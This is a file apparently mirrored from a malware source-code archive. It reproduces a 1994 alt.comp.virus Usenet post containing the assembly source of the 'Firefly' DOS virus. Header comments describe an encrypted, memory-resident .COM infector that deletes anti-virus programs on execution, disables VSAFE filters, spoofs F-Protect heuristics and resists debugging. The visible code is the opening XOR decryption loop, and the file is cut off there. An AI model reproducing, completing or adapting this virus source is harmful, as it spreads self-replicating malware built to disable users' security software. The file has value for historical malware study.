mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 15:05:27 +00:00
76 lines
3.2 KiB
NASM
76 lines
3.2 KiB
NASM
|
From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
|
||
|
Xref: netcom.com alt.comp.virus:491
|
||
|
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
|
||
|
From: halflife@axpvms.cc.utexas.edu
|
||
|
Newsgroups: alt.comp.virus
|
||
|
Subject: Firefly virus
|
||
|
Date: 28 Nov 1994 08:51:37 GMT
|
||
|
Organization: University of Texas @ Austin
|
||
|
Lines: 61
|
||
|
Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
|
||
|
Reply-To: halflife@axpvms.cc.utexas.edu
|
||
|
NNTP-Posting-Host: axpvms.cc.utexas.edu
|
||
|
|
||
|
;FIREFLY virus, by Nikademus.
|
||
|
;
|
||
|
;Firefly is an encrypted, memory resident virus which infects
|
||
|
;.COMfiles on load. It incorporates code from Proto-T,
|
||
|
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
|
||
|
;of anti-virus programs as they are executed. Anti-virus programs
|
||
|
;identified by Firefly's execute/load handler are deleted.
|
||
|
;Firefly incorporates simple code from previous issues of the newsletter
|
||
|
;designed to de-install generic VSAFE resident virus activity
|
||
|
;filters designed for Microsoft by Central Point Software. It
|
||
|
;contains instructions - specifically a segment of pseudo-nested
|
||
|
;loops - which spoof F-Protect's expert system generic virus
|
||
|
;identification feature.
|
||
|
;
|
||
|
;FIREFLY also includes a visual marker tied to the system timer
|
||
|
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
|
||
|
;and ScrollLock LEDs on the keyboard. This produces a noticeable
|
||
|
;twinkling effect when the virus is active on a machine.
|
||
|
;
|
||
|
;Anti-anti-virus measures used by Firefly vary in effectiveness
|
||
|
;dependent upon how a user employs software. For example, while
|
||
|
;Firefly is designed to delete the Victor Charlie anti-virus
|
||
|
;shell, VC.EXE, a user who employs the software packages utilities
|
||
|
;for generic virus detection singly, will not be interfered with
|
||
|
;by the virus. Your results may vary, but the virus does effectively
|
||
|
;delete anti-virus programs while in memory unless steps are taken
|
||
|
;beforehand to avoid this.
|
||
|
;
|
||
|
;Firefly incorporates minor code armoring techniques designed to thwart
|
||
|
;trivial debugging.
|
||
|
|
||
|
|
||
|
|
||
|
.radix 16
|
||
|
code segment
|
||
|
model small
|
||
|
assume cs:code, ds:code, es:code
|
||
|
|
||
|
org 100h
|
||
|
|
||
|
len equ offset last - start
|
||
|
vir_len equ len / 16d ; 16 bytes per paragraph
|
||
|
encryptlength equ (last - begin)/4+1
|
||
|
|
||
|
|
||
|
|
||
|
start:
|
||
|
mov bx, offset begin ; The Encryption Head
|
||
|
mov cx, encryptlength ;
|
||
|
encryption_loop: ;
|
||
|
db 81h ; XOR WORD PTR [BX], ????h
|
||
|
db 37h ;
|
||
|
encryption_value_1: ;
|
||
|
dw 0000h ;
|
||
|
;
|
||
|
db 81h ; XOR WORD PTR [BX+2], ????h
|
||
|
db 77h ;
|
||
|
db 02h ; 2 different random words
|
||
|
encryption_value_2: ; give 32-bit encryption
|
||
|
dw 0000h ;
|
||
|
add bx, 4 ;
|
||
|
|